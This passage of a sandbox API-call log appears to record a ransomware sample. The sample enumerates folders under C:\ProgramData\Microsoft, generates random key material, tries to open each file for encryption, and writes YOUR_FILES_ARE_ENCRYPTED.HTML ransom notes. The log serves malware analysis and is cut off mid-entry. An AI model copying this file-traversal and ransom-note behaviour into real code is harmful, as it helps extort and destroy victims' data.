[0156.706] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e7177a, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="RSA", cAlternateFileName="")) returned 0 [0156.706] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0156.706] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 65 [0156.706] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\crypto\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0156.707] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0156.709] CloseHandle (hObject=0x4a8) returned 1 [0156.709] GetProcessHeap () returned 0x270000 [0156.710] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0156.713] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e978d9, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e978d9, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Device Stage", cAlternateFileName="DEVICE~1")) returned 1 [0156.713] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage") returned 41 [0156.713] GetProcessHeap () returned 0x270000 [0156.713] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0156.722] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage" [0156.722] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\*" [0156.722] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e978d9, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e978d9, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0156.723] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e978d9, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e978d9, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.723] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e978d9, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e978d9, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Device", cAlternateFileName="")) returned 1 [0156.723] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device") returned 48 [0156.723] GetProcessHeap () returned 0x270000 [0156.723] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0156.724] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device" [0156.724] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\*" [0156.724] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e978d9, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e978d9, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0156.724] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e978d9, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e978d9, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.725] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e978d9, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e978d9, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{113527a4-45d4-4b6f-b567-97838f1b04b0}", cAlternateFileName="{11352~1")) returned 1 [0156.725] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned 87 [0156.725] GetProcessHeap () returned 0x270000 [0156.725] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0156.727] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}" [0156.727] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*" [0156.727] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e978d9, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e978d9, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0156.729] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e978d9, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e978d9, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.729] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa825f5e7, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa825f5e7, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d7b99dc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x1fad1, dwReserved0=0x0, dwReserved1=0x60, cFileName="background.png", cAlternateFileName="")) returned 1 [0156.729] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png") returned 102 [0156.729] lstrcmpW (lpString1="background.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.729] PathFindExtensionW (pszPath="background.png") returned=".png" [0156.729] lstrlenW (lpString=".png") returned 4 [0156.729] PathFindExtensionW (pszPath="background.png") returned=".png" [0156.729] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0156.729] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0156.730] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1dad96bc, ftCreationTime.dwHighDateTime=0x1c9ea14, ftLastAccessTime.dwLowDateTime=0x1dad96bc, ftLastAccessTime.dwHighDateTime=0x1c9ea14, ftLastWriteTime.dwLowDateTime=0x1dad96bc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xb61, dwReserved0=0x0, dwReserved1=0x60, cFileName="behavior.xml", cAlternateFileName="")) returned 1 [0156.730] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml") returned 100 [0156.730] lstrcmpW (lpString1="behavior.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.730] PathFindExtensionW (pszPath="behavior.xml") returned=".xml" [0156.730] lstrlenW (lpString=".xml") returned 4 [0156.730] PathFindExtensionW (pszPath="behavior.xml") returned=".xml" [0156.730] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0156.730] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0156.731] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8285746, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa8285746, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d7dfb3c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xadc8, dwReserved0=0x0, dwReserved1=0x60, cFileName="device.png", cAlternateFileName="")) returned 1 [0156.731] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png") returned 98 [0156.731] lstrcmpW (lpString1="device.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.731] PathFindExtensionW (pszPath="device.png") returned=".png" [0156.731] lstrlenW (lpString=".png") returned 4 [0156.731] PathFindExtensionW (pszPath="device.png") returned=".png" [0156.731] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0156.731] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0156.731] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa82ab8a5, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa82ab8a5, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d8c437c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x70c1, dwReserved0=0x0, dwReserved1=0x60, cFileName="overlay.png", cAlternateFileName="")) returned 1 [0156.731] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png") returned 99 [0156.731] lstrcmpW (lpString1="overlay.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.731] PathFindExtensionW (pszPath="overlay.png") returned=".png" [0156.731] lstrlenW (lpString=".png") returned 4 [0156.731] PathFindExtensionW (pszPath="overlay.png") returned=".png" [0156.731] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0156.731] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0156.732] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa82d1a04, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa82d1a04, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d8c437c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x99d3, dwReserved0=0x0, dwReserved1=0x60, cFileName="superbar.png", cAlternateFileName="")) returned 1 [0156.732] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png") returned 100 [0156.732] lstrcmpW (lpString1="superbar.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.732] PathFindExtensionW (pszPath="superbar.png") returned=".png" [0156.732] lstrlenW (lpString=".png") returned 4 [0156.732] PathFindExtensionW (pszPath="superbar.png") returned=".png" [0156.732] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0156.732] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0156.732] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa82d1a04, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa82d1a04, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d8c437c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x99d3, dwReserved0=0x0, dwReserved1=0x60, cFileName="superbar.png", cAlternateFileName="")) returned 0 [0156.732] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0156.734] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 117 [0156.734] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0156.736] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0156.738] CloseHandle (hObject=0x598) returned 1 [0156.738] GetProcessHeap () returned 0x270000 [0156.739] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0156.739] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e978d9, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e978d9, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{8702d817-5aad-4674-9ef3-4d3decd87120}", cAlternateFileName="{8702D~1")) returned 1 [0156.739] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}") returned 87 [0156.739] GetProcessHeap () returned 0x270000 [0156.739] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0156.739] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}" [0156.739] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*" [0156.739] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e978d9, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e978d9, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0156.739] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e978d9, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e978d9, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.739] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a06b8bc, ftCreationTime.dwHighDateTime=0x1c9ea14, ftLastAccessTime.dwLowDateTime=0x2a06b8bc, ftLastAccessTime.dwHighDateTime=0x1c9ea14, ftLastWriteTime.dwLowDateTime=0x2a06b8bc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x1fad1, dwReserved0=0x0, dwReserved1=0x60, cFileName="background.png", cAlternateFileName="")) returned 1 [0156.739] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png") returned 102 [0156.739] lstrcmpW (lpString1="background.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.739] PathFindExtensionW (pszPath="background.png") returned=".png" [0156.739] lstrlenW (lpString=".png") returned 4 [0156.739] PathFindExtensionW (pszPath="background.png") returned=".png" [0156.739] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0156.739] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0156.739] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64cf1c24, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x64cf1c24, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x2a06b8bc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x769, dwReserved0=0x0, dwReserved1=0x60, cFileName="behavior.xml", cAlternateFileName="")) returned 1 [0156.740] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml") returned 100 [0156.740] lstrcmpW (lpString1="behavior.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.740] PathFindExtensionW (pszPath="behavior.xml") returned=".xml" [0156.740] lstrlenW (lpString=".xml") returned 4 [0156.740] PathFindExtensionW (pszPath="behavior.xml") returned=".xml" [0156.740] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0156.740] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0156.740] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64d3dee4, ftCreationTime.dwHighDateTime=0x1ca0409, 